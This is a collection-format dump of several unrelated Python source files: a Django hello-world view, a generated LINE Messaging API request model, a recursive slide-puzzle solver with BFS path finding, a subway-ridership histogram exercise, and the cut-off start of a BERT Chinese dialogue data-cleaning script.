0e947006909b0864fa274275292cb470b8b8abb2 | 85c231cde886155a72b2bcef10d974e0507005f6 | /mydjango/mydjango/views.py | 6d31ca59d0fcc8802a3ec1d7053b832524d74b15 | [] | no_license | liuyu82910/python_project | ab720912099160ce0c089ab30ec02453678374ec | d97be5e7b81acef68af5836a54ec6b41cd9b1882 | refs/heads/master | 2022-12-25T04:05:30.834678 | 2020-08-15T07:11:48 | 2020-08-15T07:11:48 | 278,800,357 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,258 | py | from django.http import HttpResponse, Http404
from datetime import datetime as dt
from datetime import timedelta as td
# from django.template.loader import get_template
# from django.template import Context
from django.shortcuts import render_to_response
def hello(request):
    """Return a plain 'Hello world' HTTP response."""
    greeting = "Hello world"
    return HttpResponse(greeting)
def current_time(request):
    """Render the current server time inside a styled <h1> page."""
    stamp = dt.now().strftime('%H:%M:%S, %B %d, %Y')
    page = (
        "<html><body><h1 style='background-color: tomato; color:white'>"
        "It is now %s ^___^</h1></body></html>" % stamp
    )
    return HttpResponse(page)
def time_difference(request, offset):
    """Render the time `offset` hours from now; 404 on a non-numeric offset."""
    try:
        hours = round(float(offset))
    except ValueError:
        raise Http404()
    future = dt.now() + td(hours=hours)
    context = {
        'timediff': future.strftime('%H:%M:%S, %B/%d/%Y'),
        'offset': hours,
    }
    return render_to_response('time_diff.html', context)
def cur_datetime(reqeust):
    """Render the current date/time via the cur_datetime.html template."""
    # NOTE(review): parameter name 'reqeust' is a typo for 'request';
    # kept unchanged to preserve the public signature.
    stamp = dt.now().strftime('%H:%M:%S, %B %d, %Y')
    return render_to_response('cur_datetime.html', {'currentdatetime': stamp})
| [
"liuyu910@gmail.com"
] | liuyu910@gmail.com |
ef9249722a55ff00c9ec100a856e360d1281320d | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/audience/models/create_audience_group_request.py | 3d855e668830bb2b753b6d12e2288f9444ee979f | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 3,502 | py | # coding: utf-8
"""
LINE Messaging API
This document describes LINE Messaging API. # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import List, Optional
from pydantic.v1 import BaseModel, Field, StrictBool, StrictStr, conlist, constr
from linebot.v3.audience.models.audience import Audience
class CreateAudienceGroupRequest(BaseModel):
    """
    Create audience for uploading user IDs (by JSON)
    https://developers.line.biz/en/reference/messaging-api/#create-upload-audience-group

    Auto-generated by OpenAPI Generator -- do not hand-edit the logic.
    """
    description: Optional[constr(strict=True, max_length=120)] = Field(None, description="The audience's name. This is case-insensitive, meaning AUDIENCE and audience are considered identical. Max character limit: 120 ")
    is_ifa_audience: Optional[StrictBool] = Field(None, alias="isIfaAudience", description="To specify recipients by IFAs: set true. To specify recipients by user IDs: set false or omit isIfaAudience property. ")
    upload_description: Optional[StrictStr] = Field(None, alias="uploadDescription", description="The description to register for the job (in jobs[].description). ")
    audiences: Optional[conlist(Audience, max_items=10000)] = Field(None, description="An array of user IDs or IFAs. Max number: 10,000 ")
    # Ordered list of the JSON (alias) field names this model serializes.
    __properties = ["description", "isIfaAudience", "uploadDescription", "audiences"]

    class Config:
        """Pydantic configuration"""
        allow_population_by_field_name = True
        validate_assignment = True

    def to_str(self) -> str:
        """Returns the string representation of the model using alias"""
        return pprint.pformat(self.dict(by_alias=True))

    def to_json(self) -> str:
        """Returns the JSON representation of the model using alias"""
        return json.dumps(self.to_dict())

    @classmethod
    def from_json(cls, json_str: str) -> CreateAudienceGroupRequest:
        """Create an instance of CreateAudienceGroupRequest from a JSON string"""
        return cls.from_dict(json.loads(json_str))

    def to_dict(self):
        """Returns the dictionary representation of the model using alias"""
        _dict = self.dict(by_alias=True,
                          exclude={
                          },
                          exclude_none=True)
        # override the default output from pydantic.v1 by calling `to_dict()` of each item in audiences (list)
        _items = []
        if self.audiences:
            for _item in self.audiences:
                if _item:
                    _items.append(_item.to_dict())
            _dict['audiences'] = _items
        return _dict

    @classmethod
    def from_dict(cls, obj: dict) -> CreateAudienceGroupRequest:
        """Create an instance of CreateAudienceGroupRequest from a dict"""
        if obj is None:
            return None

        if not isinstance(obj, dict):
            # Not a plain dict: let pydantic coerce/validate it directly.
            return CreateAudienceGroupRequest.parse_obj(obj)

        _obj = CreateAudienceGroupRequest.parse_obj({
            "description": obj.get("description"),
            "is_ifa_audience": obj.get("isIfaAudience"),
            "upload_description": obj.get("uploadDescription"),
            "audiences": [Audience.from_dict(_item) for _item in obj.get("audiences")] if obj.get("audiences") is not None else None
        })
        return _obj
| [
"noreply@github.com"
] | line.noreply@github.com |
c155d07d27b831ab729a74bb6b147a589478f3e5 | b276cd464e7680fcf1b755fccea434ff98699fbb | /slide_new.py | ea12644286fed5a9781e4002b24c94f4acc7cc63 | [] | no_license | justingiardino/SlideFinal | a32168972ebb4c07f99ce494446605452b2a8eca | e2ea2b95fd3040fa1244cc17af926408fef1d577 | refs/heads/master | 2021-05-17T16:09:52.747875 | 2020-03-28T18:27:28 | 2020-03-28T18:27:28 | 250,863,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,893 | py | import copy
import time
import breadth_first_search
import sys
import os
#ran into recursion error
sys.setrecursionlimit(10000)
class Board(object):
    def __init__(self):
        """Interactive driver: load a puzzle, enumerate the move graph,
        then run BFS to report the shortest solution(s)."""
        self.v_size = 0  # board height (rows)
        self.h_size = 0  # board width (columns)
        self.blank_board =[]  # used in print_board, initialize after getting board size
        self.piece_list = []  # keep track of all pieces
        self.piece_objects = {}  # per-vertex piece attributes: {vertex: {piece: {start_v, start_h, length, direction}}}
        self.board_objects = {}  # per-vertex board layout (list-of-lists grid)
        self.vertex_dict = {}  # adjacency list: vertex -> list of reachable vertices
        self.end_vertices = []  # vertices where the game is won
        self.final_graph = {}  # dictionary of sets, for the (unused) DFS path finder
        self.final_solutions = []  # shortest solution list, may just be one item
        print("Welcome to the newest slide puzzle solver!\n")
        self.debug_mode = int(input("Would you like to turn on debug mode?\n1) Yes\n2) No\n>"))
        self.load_board()
        print("\n\n" + "*"*20 + "\nBoard loaded, starting solver")
        # Vertex 0 is the starting layout; time the graph construction.
        self.vertex_dict[0] = []
        start = time.time()
        self.solve_puzzle(0)
        end = time.time()
        build_graph_time = round((end - start), 4)
        input(f"Finished analyzing all moves!\nTime elapsed: {build_graph_time} seconds\nDetermining best path..\n>")
        #changed to bfs
        self.find_best_path_bfs()
        self.print_final_solutions()
        print("""
 _______ _ _____ _ _
|__ __(_) / ____| | | | _
 | | _ _ __ ___ ___ | (___ | |_ __ _| |_ ___ (_)
 | | | | '_ ` _ \ / _ \ \___ \| __/ _` | __/ __|
 | | | | | | | | | __/ ____) | || (_| | |_\__ \ _
 |_| |_|_| |_| |_|\___| |_____/ \__\__,_|\__|___/ (_)
        """)
        print(f"\n\t\tPre-processing: {build_graph_time} seconds\n\t\tPath finding: {self.bfs_time} seconds")
#add border print later
def print_board_simple(self, current_board):
for v in range(self.v_size):
for h in range(self.h_size):
print(current_board[v][h],end='')
print("")
#debugging only
def print_piece_stats(self, current_vertex):
for piece in self.piece_objects[current_vertex].keys():
print(f"Piece: {piece}\nStart_v: {self.piece_objects[current_vertex][piece]['start_v']}\nStart_h: {self.piece_objects[current_vertex][piece]['start_h']}\nLength: {self.piece_objects[current_vertex][piece]['length']}\nDirection: {self.piece_objects[current_vertex][piece]['direction']}\n")
#initialize board display with pieces
def build_print_board(self, current_vertex):
print("In print board")
#creating temporary show board
show_board = [['.' for x in range(self.h_size)] for y in range(self.v_size)]
#build show board based on current vertex
self.print_piece_stats(current_vertex)
for piece in self.piece_objects[current_vertex].keys():
print(f"Piece: {piece}")
#print horiztonal piece
if self.piece_objects[current_vertex][piece]['direction'] == 'h':
for h_off in range(self.piece_objects[current_vertex][piece]['length']):
show_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']+h_off] = piece
#print vertical piece
elif self.piece_objects[current_vertex][piece]['direction'] == 'v':
for v_off in range(self.piece_objects[current_vertex][piece]['length']):
show_board[self.piece_objects[current_vertex][piece]['start_v']+v_off][self.piece_objects[current_vertex][piece]['start_h']] = piece
print(show_board)
self.board_objects[current_vertex] = show_board
# self.print_board_simple(show_board)
    def load_board(self):
        """Prompt for a puzzle file, read it, and build the vertex-0 piece
        dictionary (anchor cell, length, direction) for every piece."""
        puzzle_choice = 0
        puzzle_vals = [1,2,3,4,5,6]
        while puzzle_choice not in puzzle_vals:
            puzzle_choice = int(input("Which puzzle?\n1)Small\n2)Regular1\n3)Regular2\n4)Intermediate1\n5)Expert1\n6)Expert2\n>"))
        if puzzle_choice == 1:
            with open('Sliders/puzzle_layout_small.txt', 'r') as puzzle_read:
                puzzle_in = puzzle_read.read().splitlines()
        elif puzzle_choice == 2:
            with open('Sliders/puzzle_layout.txt', 'r') as puzzle_read:
                puzzle_in = puzzle_read.read().splitlines()
        elif puzzle_choice == 3:
            with open('Sliders/puzzle_layout2.txt', 'r') as puzzle_read:
                puzzle_in = puzzle_read.read().splitlines()
        elif puzzle_choice == 4:
            with open('Sliders/puzzle_layout3.txt', 'r') as puzzle_read:
                puzzle_in = puzzle_read.read().splitlines()
        elif puzzle_choice == 5:
            with open('Sliders/puzzle_layout4.txt', 'r') as puzzle_read:
                puzzle_in = puzzle_read.read().splitlines()
        elif puzzle_choice == 6:
            with open('Sliders/puzzle_layout5.txt', 'r') as puzzle_read:
                puzzle_in = puzzle_read.read().splitlines()
        self.v_size = len(puzzle_in)
        self.h_size = len(puzzle_in[0])
        self.blank_board = [['.' for x in range(self.h_size)] for y in range(self.v_size)]
        self.print_board_simple(puzzle_in)
        print("Building board..")
        # '#', '.' and '_' are board furniture, not movable pieces.
        invalid_piece_list = ['#','.','_']
        #build board
        self.piece_objects[0]= {}
        for v in range(self.v_size):
            for h in range(self.h_size):
                #if finding for the first time, create dictionary value
                current_piece = puzzle_in[v][h]
                #only want to find letters
                if(current_piece not in invalid_piece_list):
                    #initialize piece stats if it hasn't been added yet
                    if(current_piece not in self.piece_objects[0].keys()):
                        self.piece_objects[0][current_piece] = {'start_v':v, 'start_h':h,'length':1}
                        ##check direction, won't be above or to the left and check boundaries, make sure you aren't in the last row or column
                        if(v < self.v_size-1):
                            if(puzzle_in[v+1][h] == current_piece):
                                #update direction as v - vertical
                                self.piece_objects[0][current_piece]['direction'] = 'v'
                        if(h < self.h_size-1):
                            if(puzzle_in[v][h+1] == current_piece):
                                #update direction as h - horizontal
                                self.piece_objects[0][current_piece]['direction'] = 'h'
                    #increment length if letter has already been added
                    else:
                        self.piece_objects[0][current_piece]['length']+=1
        self.build_print_board(0)
#main recursive function
    def solve_puzzle(self, current_vertex):
        """Depth-first enumeration of the move graph from `current_vertex`.

        Slides every piece one cell in each legal direction.  A move that
        produces a board layout never seen before allocates a new vertex,
        records the edge in self.vertex_dict and recurses; a move that
        reproduces a known layout only records the edge to the existing
        vertex.  A vertex where the 'x' piece reaches the right edge is a
        winning state and is appended to self.end_vertices.
        """
        #check movability of each piece
        for piece in self.piece_objects[current_vertex].keys():
            print(f"Current vertex: {current_vertex} Current piece: {piece}\nCurrent board:")
            self.print_board_simple(self.board_objects[current_vertex])
            if self.debug_mode == 1:
                print(f"Current vertex_dict: {self.vertex_dict}")
            # Scratch copy of the board to try moves on.
            temp_board = copy.deepcopy(self.board_objects[current_vertex])
            if self.debug_mode == 1:
                input("Continue to check this piece\n>")
            if self.piece_objects[current_vertex][piece]['direction'] == 'h':
                print(f"piece: {piece} Direction: Horizontal")
                #check move left
                if self.piece_objects[current_vertex][piece]['start_h'] == 0:
                    print("Can't move left, boundary issue")
                elif temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']-1] != '.':
                    print("Can't move left, other piece in the way")
                else:
                    print("Temporarily moving left")
                    temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']-1] = piece
                    temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length']-1] = '.'
                    self.print_board_simple(temp_board)
                    #if haven't already found this board, move to new vertex
                    if temp_board not in self.board_objects.values():
                        print("This move left has not been found before")
                        next_vertex = len(self.board_objects.keys())
                        print(f"Next vertex: {next_vertex}")
                        self.board_objects[next_vertex] = temp_board
                        if self.debug_mode == 1:
                            print(self.board_objects)
                        self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
                        self.piece_objects[next_vertex][piece]['start_h'] -= 1
                        #call recursion
                        self.vertex_dict[current_vertex].append(next_vertex)
                        self.vertex_dict[next_vertex] = []
                        if self.debug_mode == 1:
                            input("Stepping to next vertex\n>")
                        self.solve_puzzle(next_vertex)
                        #reset temp board on return
                        print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
                        self.print_board_simple(self.board_objects[current_vertex])
                        if self.debug_mode == 1:
                            input(">")
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
                    #else have found it and want to skip
                    else:
                        #has to be in list format, grab 0th element which should be the only element
                        found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
                        print(found_vertex)
                        print(f"This move left has already been found at vertex: {found_vertex}")
                        self.vertex_dict[current_vertex].append(found_vertex)
                        #reprint the board?
                        #reset temp board
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
                #check move right
                if self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length'] + 1 > self.h_size:
                    print("Can't move right, boundary issue")
                elif temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length']] != '.':
                    print("Can't move right, other piece in the way")
                else:
                    print("Temporarily moving right")
                    temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']] = '.'
                    temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length']] = piece
                    self.print_board_simple(temp_board)
                    if temp_board not in self.board_objects.values():
                        print("This move right has not been found before")
                        next_vertex = len(self.board_objects.keys())
                        print(f"Next vertex: {next_vertex}")
                        self.board_objects[next_vertex] = temp_board
                        if self.debug_mode == 1:
                            print(self.board_objects)
                        self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
                        self.piece_objects[next_vertex][piece]['start_h'] += 1
                        #call recursion
                        self.vertex_dict[current_vertex].append(next_vertex)
                        self.vertex_dict[next_vertex] = []
                        #check for game over before stepping again in recursion, only on move right because x moving right is the only way to win
                        if piece == 'x':
                            #assuming length of 2
                            print(f"Checking for game over -adding 1 to start_h\nNext x starth_h: {self.piece_objects[next_vertex]['x']['start_h']} h_size: {self.h_size}")
                            if self.piece_objects[next_vertex]['x']['start_h'] + 2 == self.h_size:
                                if self.debug_mode == 1:
                                    input("This move solves the puzzle!\n>")
                                self.end_vertices.append(next_vertex)
                                print(f"Current end vertices: {self.end_vertices}")
                                # Winning vertex: don't recurse past the goal.
                                break
                        # check for game over
                        if self.debug_mode == 1:
                            input("Stepping to next vertex\n>")
                        self.solve_puzzle(next_vertex)
                        #reset temp board on return
                        print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
                        self.print_board_simple(self.board_objects[current_vertex])
                        if self.debug_mode == 1:
                            input(">")
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
                    else:
                        #has to be in list format, grab 0th element which should be the only element
                        found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
                        print(found_vertex)
                        print(f"This move right has already been found at vertex: {found_vertex}")
                        self.vertex_dict[current_vertex].append(found_vertex)
                        #reset temp board
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
            #vertical
            else:
                print(f"piece: {piece} Direction: Vertical")
                #check move up
                if self.piece_objects[current_vertex][piece]['start_v'] == 0:
                    print("Can't move up, boundary issue")
                elif temp_board[self.piece_objects[current_vertex][piece]['start_v']-1][self.piece_objects[current_vertex][piece]['start_h']] != '.':
                    print("Can't move up, other piece in the way")
                else:
                    print("Temporarily moving up")
                    temp_board[self.piece_objects[current_vertex][piece]['start_v']-1][self.piece_objects[current_vertex][piece]['start_h']] = piece
                    temp_board[self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length']-1][self.piece_objects[current_vertex][piece]['start_h']] = '.'
                    self.print_board_simple(temp_board)
                    if temp_board not in self.board_objects.values():
                        print("This move up has not been found before")
                        next_vertex = len(self.board_objects.keys())
                        print(f"Next vertex: {next_vertex}")
                        self.board_objects[next_vertex] = temp_board
                        if self.debug_mode == 1:
                            print(self.board_objects)
                        self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
                        self.piece_objects[next_vertex][piece]['start_v'] -= 1
                        #call recursion
                        self.vertex_dict[current_vertex].append(next_vertex)
                        self.vertex_dict[next_vertex] = []
                        if self.debug_mode == 1:
                            input("Stepping to next vertex\n>")
                        self.solve_puzzle(next_vertex)
                        #reset temp board on return
                        print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
                        self.print_board_simple(self.board_objects[current_vertex])
                        if self.debug_mode == 1:
                            input(">")
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
                    else:
                        #has to be in list format, grab 0th element which should be the only element
                        found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
                        print(found_vertex)
                        print(f"This move up has already been found at vertex: {found_vertex}")
                        self.vertex_dict[current_vertex].append(found_vertex)
                        #removing this logic from all moves, not sure if I want to do this
                        #this would have removed a move that is an "undo" of the previous move, but it might remove a connection that would lead to a quicker solve
                        # if current_vertex not in self.vertex_dict[found_vertex]:
                        #     print("Adding to vertex dict, this is not reverting move")
                        #     self.vertex_dict[current_vertex].append(found_vertex)
                        # else:
                        #     print("Not adding to vertex dict, this is reverting move")
                        #reset temp board
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
                #check move down
                if self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length'] + 1 > self.v_size:
                    print("Can't move down, boundary issue")
                elif temp_board[self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length']][self.piece_objects[current_vertex][piece]['start_h']] != '.':
                    print("Can't move down, other piece in the way")
                else:
                    print("Temporarily moving Down")
                    temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']] = '.'
                    temp_board[self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length']][self.piece_objects[current_vertex][piece]['start_h']] = piece
                    self.print_board_simple(temp_board)
                    if temp_board not in self.board_objects.values():
                        print("This move down has not been found before")
                        next_vertex = len(self.board_objects.keys())
                        print(f"Next vertex: {next_vertex}")
                        self.board_objects[next_vertex] = temp_board
                        if self.debug_mode == 1:
                            print(self.board_objects)
                        self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
                        self.piece_objects[next_vertex][piece]['start_v'] += 1
                        #call recursion
                        self.vertex_dict[current_vertex].append(next_vertex)
                        self.vertex_dict[next_vertex] = []
                        if self.debug_mode == 1:
                            input("Stepping to next vertex\n>")
                        self.solve_puzzle(next_vertex)
                        #reset temp board on return
                        #add direction moved to this print
                        print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
                        self.print_board_simple(self.board_objects[current_vertex])
                        if self.debug_mode == 1:
                            input(">")
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
                    else:
                        #has to be in list format, grab 0th element which should be the only element
                        found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
                        print(found_vertex)
                        print(f"This move down has already been found at vertex: {found_vertex}")
                        self.vertex_dict[current_vertex].append(found_vertex)
                        #reset temp board
                        temp_board = copy.deepcopy(self.board_objects[current_vertex])
            if self.debug_mode == 1:
                input("Continue to next piece\n>")
        if self.debug_mode == 1:
            input(f"Reached end of solve puzzle function for vertex: {current_vertex}\n>")
    def find_best_path_bfs(self):
        """Run BFS from the start board (vertex 0) to every exit vertex and
        keep only the path(s) tied for shortest in self.final_solutions.

        Interactive: pauses with input() and prints progress. Timing of the
        BFS phase is stored in self.bfs_time (seconds, 4 decimals).
        """
        solution_list = []
        # print(f"Final vertex dict: {self.vertex_dict}\nExit points: {self.end_vertices}")
        b_start = time.time()
        for exit_point in self.end_vertices:
            print(f"Checking exit point: {exit_point}")
            # Shortest vertex path from the initial board to this exit board.
            paths = breadth_first_search.bfs_shortest_path(self.vertex_dict, 0, exit_point)
            solution_list.append(paths)
        b_end = time.time()
        self.bfs_time = round((b_end - b_start),4)
        num_solutions = len(solution_list)
        input(f"Found {num_solutions} useful solutions, time elapsed finding all solutions: {self.bfs_time} seconds\nLooking for shortest solution..\n>")
        # print("Looking for shortest solution..\nAll solutions:")
        solution_list.sort(key=len)  # shortest path first
        shortest_len = len(solution_list[0])
        for temp_solution in solution_list:
            # print(temp_solution)
            if len(temp_solution) == shortest_len:  # keep every path tied for shortest
                self.final_solutions.append(temp_solution)
        print("Shortest solutions")
        print(self.final_solutions)
        input(">")
    #not used anymore
    def find_best_path(self):
        """Older DFS-based variant of find_best_path_bfs (kept for reference).

        Builds an adjacency-set graph in self.final_graph, enumerates ALL
        paths per exit point with dfs_paths, then appends the shortest ones
        to self.final_solutions. Superseded by find_best_path_bfs.
        """
        print(f"Final vertex dict: {self.vertex_dict}\nExit points: {self.end_vertices}\nPrinting all boards..")
        for temp_vertex in self.board_objects.keys():
            self.final_graph[temp_vertex] = set(self.vertex_dict[temp_vertex])
        input(f"final_graph: \n{self.final_graph}\n>")
        input(f"Adjacency graph\n>")
        breadth_first_search.print_graph(self.final_graph)
        input(f"Exit points: {self.end_vertices}\n>")
        for exit_point in self.end_vertices:
            print(f"Checking exit point: {exit_point}")
            solution_list = list(breadth_first_search.dfs_paths(self.final_graph, 0, exit_point))
            solution_list.sort(key=len)
            print("All solutions:")
            for temp_solution in solution_list:
                print(temp_solution)
            print("Final shortest solutions")
            shortest_len = len(solution_list[0])
            for short_solution in solution_list:
                # The list is sorted, so the first longer path ends the scan.
                if len(short_solution) > shortest_len:
                    print("No more solutions")
                    break
                print(f"Short solution: {short_solution}")
                self.final_solutions.append(short_solution)
def print_final_solutions(self):
os.system("cls")
input("Printing final solutions\n>")
for solution in self.final_solutions:
for vertex in solution:
os.system("cls")
print("\n")
self.print_board_simple(self.board_objects[vertex])
input(">")
input("Finished this solution\n>")
print("Finished displaying the shortest solutions! Any one of these will win the game")
if __name__ == "__main__":
    piece_objects = Board()  # NOTE(review): Board() presumably runs the whole solve as a constructor side effect — confirm
| [
"justingiardino13@gmail.com"
] | justingiardino13@gmail.com |
5d0a5af32df39acffb88df65ec1b23591c0e6994 | 9cb364e810abf5c1fd549fdf9c6feb0143f5a62b | /ps3/1-exploratory-data-analysis.py | c8ddf64251cbe2ff5fc1b3dc811899848bea58ee | [] | no_license | bharteesh/udacity-DAND-project2 | b8503856d17ab777571abad70a92f129476c36cf | 70ddbceb2ae8145f48364c83c97a75fe3a52ab15 | refs/heads/master | 2021-01-10T14:09:06.138972 | 2015-10-20T15:50:11 | 2015-10-20T15:50:11 | 44,265,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | import numpy as np
import pandas
import matplotlib.pyplot as plt
def entries_histogram(turnstile_weather):
    '''
    Before we perform any analysis, it might be useful to take a
    look at the data we're hoping to analyze. More specifically, let's
    examine the hourly entries in our NYC subway data and determine what
    distribution the data follows. This data is stored in a dataframe
    called turnstile_weather under the ['ENTRIESn_hourly'] column.
    Let's plot two histograms on the same axes to show hourly
    entries when raining vs. when not raining. Here's an example on how
    to plot histograms with pandas and matplotlib:
    turnstile_weather['column_to_graph'].hist()
    Your histogram may look similar to bar graph in the instructor notes below.
    You can read a bit about using matplotlib and pandas to plot histograms here:
    http://pandas.pydata.org/pandas-docs/stable/visualization.html#histograms
    You can see the information contained within the turnstile weather data here:
    https://www.dropbox.com/s/meyki2wl9xfa7yk/turnstile_data_master_with_weather.csv
    '''
    plt.figure()
    # NOTE: the original trailing comments on the next two lines were swapped.
    turnstile_weather['ENTRIESn_hourly'][turnstile_weather['rain'] == 0].hist(bins=200) # hourly entries when it is NOT raining (rain == 0)
    turnstile_weather['ENTRIESn_hourly'][turnstile_weather['rain'] == 1].hist(bins=200) # hourly entries when it IS raining (rain == 1)
    plt.axis([0,6000,0,50000])  # clip the long right tail for readability
    plt.xlabel('ENTRIESn_hourly')
    plt.ylabel('Frequency')
    plt.title('Histogram of ENTRIESn_hourly')
    plt.legend(['No rain', 'Rain'])  # legend order matches the plot order above
    return plt
| [
"bharteesh.kulkarni@ithaka.org"
] | bharteesh.kulkarni@ithaka.org |
2eeeadd45efe7599faffad71d6603bc53101fad8 | 055b99544c0b0b8f1388f40f1ad4298a52b9a9b4 | /200409_overfit.py | f4a375daa2eac44563727a4ff626fde5728e2a49 | [
"MIT"
] | permissive | youngzhou97qz/Beam-Search-Retrieval | dd5d16710229d7b71532b93ab7b4ddb29ba01a51 | 5e71d3f88c774af28adedbf2194d3b1b5d98a426 | refs/heads/master | 2022-11-24T08:59:55.469361 | 2020-07-29T07:14:24 | 2020-07-29T07:14:24 | 241,295,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,532 | py | import math
import random
import numpy as np
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
from transformers import *
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
pretrained_weights = 'bert-base-chinese'
tokenizer = BertTokenizer.from_pretrained(pretrained_weights) # tokenizer.vocab_size = 21128
token_id = tokenizer.convert_tokens_to_ids
mask_model = BertForMaskedLM.from_pretrained('bert-base-chinese').to(device)
mask_model.eval()
ser = 'dango'
# data part
# reading data
# Parallel lists: questions[i] / answers[i] / answer_ids[i] describe one QA pair.
questions, answers, answer_ids = [], [], []
f = open('/home/'+ser+'/STC3/data/questions.txt','r',encoding='gbk')  # corpus files are gbk-encoded
lines = f.readlines()
for line in lines:
    line = line.strip()
    questions.append(line)
f.close()
f = open('/home/'+ser+'/STC3/data/answers.txt','r',encoding='gbk')
lines = f.readlines()
for line in lines:
    line = line.strip()
    answers.append(line)
f.close()
f = open('/home/'+ser+'/STC3/data/answers_id.txt','r',encoding='gbk')
lines = f.readlines()
for line in lines:
    line = line.strip()
    answer_ids.append(int(line))  # per-answer label; 4 is kept by the filter below (anger, per the output file names)
f.close()
# judging chinese
def check_contain_chinese(check_str):
    """Return True when at least one third of the characters are CJK
    ideographs (U+4E00..U+9FFF).

    Note the quirk inherited from the threshold: an empty string yields
    True (0 >= 0); callers filter zero-length strings separately.
    """
    cjk_total = sum(1 for ch in check_str if '\u4e00' <= ch <= '\u9fff')
    return cjk_total >= len(check_str) // 3
# delete sentences
# Walk backwards so pop(i) never shifts an index we have not visited yet;
# answer_ids is left untouched, which stays aligned for indices below i.
i = len(questions)-1
while i >= 0:
    if answer_ids[i] != 4:  # keep only label 4 (anger, judging by the log/out file names below)
        questions.pop(i)
        answers.pop(i)
    elif check_contain_chinese(questions[i])==False or check_contain_chinese(answers[i])==False or len(questions[i])==0 or len(answers[i])==0:
        # Drop pairs that are empty or not sufficiently Chinese on either side.
        questions.pop(i)
        answers.pop(i)
    i -= 1
# print('问答对:', len(questions)) # 1630292 anger: 184590
# standardization
import string
punc = string.punctuation + '!?。。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟…‧﹏.'
def del_punc_dup(text, slide_len, punc):  # window = len // 2 down to 1 at the call site
    """Remove the FIRST window of ``slide_len`` tokens that immediately
    repeats its predecessor, but only when that window contains punctuation
    or a '##' wordpiece; otherwise stop scanning and return ``text``
    unchanged. Only the first adjacent duplicate is ever considered.
    """
    for start in range(slide_len, len(text) - slide_len + 1):
        window = text[start:start + slide_len]
        if window == text[start - slide_len:start]:
            if any(tok in punc or (len(tok) > 2 and tok.startswith('##')) for tok in window):
                return text[:start] + text[start + slide_len:]
            break  # first duplicate is "clean": keep the text as-is
    return text
def del_char_dup(text, slide_len):  # window = len // 4 down to 1 at the call site
    """Collapse the FIRST run of four identical consecutive windows of
    ``slide_len`` tokens down to three repeats; otherwise return ``text``
    unchanged."""
    for end in range(3 * slide_len, len(text) - slide_len + 1):
        w4 = text[end:end + slide_len]
        w3 = text[end - slide_len:end]
        w2 = text[end - 2 * slide_len:end - slide_len]
        w1 = text[end - 3 * slide_len:end - 2 * slide_len]
        if w4 == w3 and w2 == w3 and w2 == w1:
            return text[:end] + text[end + slide_len:]
    return text
def pre_process(text, punc): # was: 去除多余空格和'',保留一定数量的重复元素 — strip redundant repeats, keep a bounded amount
    """Tokenize each sentence in place and squeeze repeated token windows.

    Pass 1 removes duplicated windows containing punctuation/wordpieces
